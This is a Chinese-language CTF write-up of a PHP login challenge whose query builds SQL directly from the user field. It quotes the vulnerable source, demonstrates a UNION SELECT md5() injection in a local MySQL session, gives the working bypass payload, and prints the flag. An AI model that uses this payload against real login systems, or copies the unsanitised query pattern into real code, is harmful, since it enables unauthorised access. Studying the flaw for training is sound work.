程序逻辑问题
原题链接
分析
查看源码有个index.txt
<?php
if($_POST[user] && $_POST[pass]) {
$conn = mysql_connect("********, "*****", "********");
mysql_select_db("phpformysql") or die("Could not select database");
if ($conn->connect_error) {
die("Connection failed: " . mysql_error($conn));
}
$user = $_POST[user];
$pass = md5($_POST[pass]);
$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
printf("Error: %s\n", mysql_error($conn));
exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
//strcasecmp — 二进制安全比较字符串(不区分大小写)
//和strcmp不同,这里没法通过php弱类型绕过
echo "<p>Logged in! Key:************** </p>";
}
else {
echo("<p>Log in failure!</p>");
}
上面这段代码的逻辑是这样的:
- 获取user的那一行数据。
- 把user哪一行数据的pw列,md5运算后,与提交的pass数据做比较,相等就输出flag。
这里提交的pass,我们可控,只要能查出一个pw就行,无所谓是谁的pw
就是说user其实无所谓是哪个,无所谓知不知道,只要利用user提交sql注入语句查到一个md5(pw)
且于提交的md5(pass)相等就行。
可以本地做个测试,更清楚的说明这个问题:
mysql> select * from user;
+----------+-----+------------+
| Username | Age | Password |
+----------+-----+------------+
| olivia | 18 | slimslim |
| qingchen | 18 | meimima123 |
| hack | 1 | love_pwn |
| someome | 3 | p@55w0rd |
+----------+-----+------------+
4 rows in set (0.00 sec)
mysql> select password from user where username='hack' union select md5(1);
+----------------------------------+
| password |
+----------------------------------+
| love_pwn |
| c4ca4238a0b923820dcc509a6f75849b |
+----------------------------------+
2 rows in set (0.00 sec)
mysql> select password from user where username='xman' union select md5(1);
+----------------------------------+
| password |
+----------------------------------+
| c4ca4238a0b923820dcc509a6f75849b |
+----------------------------------+
1 row in set (0.00 sec)
于是有了payload:
user=wobuxiwnagyouzhegeren' union select md5(123)#&pass=123
结果:
Logged in! Key: SimCTF{youhaocongming}
flag
SimCTF{youhaocongming}
知识点
代码审计
sql注入
